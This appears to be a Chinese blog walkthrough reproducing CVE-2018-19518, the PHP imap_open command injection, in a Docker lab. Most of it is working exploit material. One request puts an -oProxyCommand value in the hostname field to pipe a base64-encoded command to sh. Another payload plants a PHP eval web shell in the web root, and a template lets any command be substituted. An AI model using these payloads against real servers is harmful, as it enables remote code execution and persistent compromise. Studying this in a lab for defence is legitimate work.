CVE-2018-19518PHP漏洞

1.启动环境

bash 复制代码
docker-compose up -d

2.访问网站

bash 复制代码
http://192.168.63.156:8080/

3.打开BurpSuite

拦截到访问请求,发送到repeater。修改请求内容

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx

执行的命令是

bash 复制代码
echo '1234567890'>/tmp/test0001

进行base64加密后变成

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQ==

需要转换一下,+(%2b);TAB(%09);=(%3d)

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d

完整的请求

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx
bash 复制代码
# 原始payload
x+-oProxyCommand=echo	echo '<?php eval($_POST[1]);' > /var/www/html/1.php|base64	-d|sh}

# base64+url编码以后
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}

# 模板
hostname=x+-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}&username=xxx&password=xxx

这个请求forward以后。

在bash中查看是否创建成功。执行下面命令进入环境bash

bash 复制代码
sudo docker exec -it e78a02c75bd8 /bin/bash

可以看到已经创建成功test0001

参考

https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from=333.788.videopod.episodes&vd_source=4677d71876ccb847909253468ef2f55c&p=4

CVE-2018-19518 漏洞复现-CSDN博客

相关推荐
浅止菌3 小时前
嵌入式设备ping不通?tcpdump 5分钟找到凶手,比加printf快10倍
linux
巴啦啦小魔仙变身3 小时前
SIGINT = Signal Interrupte
linux·服务器·python
RisunJan3 小时前
Linux命令-route(查看/修改 IP 路由表)
linux·运维
凉、介4 小时前
Linux 设备驱动匹配机制
linux·笔记·单片机·学习·操作系统·嵌入式
卵男(章鱼)4 小时前
第4章:软件架构与SOA
linux·车载系统·汽车
是摆烂第一名呀4 小时前
【RK3506】RGB屏幕与背光调试记录
linux·arm开发·驱动开发·嵌入式硬件
qetfw4 小时前
CentOS 7 搭建 DNS 主从服务
linux·运维·centos·dns·bind
JustNow_Man5 小时前
【Claude Code】 中给 Python + XML 项目建立可靠验证体系
xml·linux·python